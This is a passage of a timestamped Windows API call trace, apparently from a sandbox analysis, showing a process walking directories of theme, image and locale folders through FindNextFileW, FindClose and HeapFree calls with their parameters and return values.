(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.021] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3674adb, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3674adb, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3674adb, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="libs", cAlternateFileName="")) returned 0 [0174.021] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0174.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.021] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3674adb, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3674adb, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3674adb, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dev", cAlternateFileName="")) returned 0 [0174.021] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0174.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.021] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x9ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="main-cef-mac.css", cAlternateFileName="MAIN-C~2.CSS")) returned 1 [0174.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.024] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee66f38b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="images", cAlternateFileName="")) returned 1 [0174.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.031] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee707cad, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee707cad, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee707cad, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 1 [0174.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0174.035] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee707cad, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee707cad, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee707cad, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0174.035] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0174.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.035] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee707cad, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee707cad, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee707cad, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0174.035] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0174.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.035] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6955c5, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee6955c5, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee6955c5, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi_contrast", cAlternateFileName="HI_CON~1")) returned 1 [0174.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.039] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee77a392, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee77a392, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x1185, dwReserved0=0x0, dwReserved1=0x0, cFileName="illustrations.png", cAlternateFileName="ILLUST~2.PNG")) returned 1 [0174.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.045] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee707cad, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee707cad, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee707cad, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dark", cAlternateFileName="")) returned 0 [0174.045] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0174.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.046] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee77a392, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee77a392, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee77a392, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="win-scrollbar", cAlternateFileName="WIN-SC~1")) returned 1 [0174.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0174.053] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee77a392, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee77a392, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee77a392, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0174.053] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0174.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.053] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee77a392, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee77a392, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee77a392, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x114, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vscroll-thumb.png", cAlternateFileName="VSCROL~1.PNG")) returned 1 [0174.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.053] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6bb82b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee6e1a70, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee6e1a70, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="win8-scrollbar", cAlternateFileName="WIN8-S~1")) returned 1 [0174.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0174.059] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6e1a70, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee6e1a70, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee6e1a70, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0174.059] FindClose (in: hFindFile=0x727708 | out: hFindFile=0x727708) returned 1 [0174.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.059] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6e1a70, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee6e1a70, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee6e1a70, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0174.060] FindClose (in: hFindFile=0x727a48 | out: hFindFile=0x727a48) returned 1 [0174.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.060] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6bb82b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee6e1a70, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee6e1a70, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="win8-scrollbar", cAlternateFileName="WIN8-S~1")) returned 0 [0174.060] FindClose (in: hFindFile=0x727588 | out: hFindFile=0x727588) returned 1 [0174.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.386] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="js", cAlternateFileName="")) returned 1 [0174.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.408] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca-es", cAlternateFileName="")) returned 1 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.409] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3379b53, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3379b53, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3379b53, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.409] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da-dk", cAlternateFileName="")) returned 1 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.409] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de-de", cAlternateFileName="")) returned 1 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.409] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-ae", cAlternateFileName="")) returned 1 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.410] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-gb", cAlternateFileName="")) returned 1 [0174.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.412] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-il", cAlternateFileName="")) returned 1 [0174.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.414] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es-es", cAlternateFileName="")) returned 1 [0174.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.415] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu-es", cAlternateFileName="")) returned 1 [0174.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.419] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0174.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.419] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0174.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.422] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0174.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.422] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he-il", cAlternateFileName="")) returned 1 [0174.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.434] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0174.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.435] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0174.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.441] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="it-it", cAlternateFileName="")) returned 1 [0174.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.442] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0174.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.442] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33ec237, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33ec237, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33ec237, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0174.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.446] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33c5ffa, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x33c5ffa, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x33c5ffa, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nb-no", cAlternateFileName="")) returned 1 [0174.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.446] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, 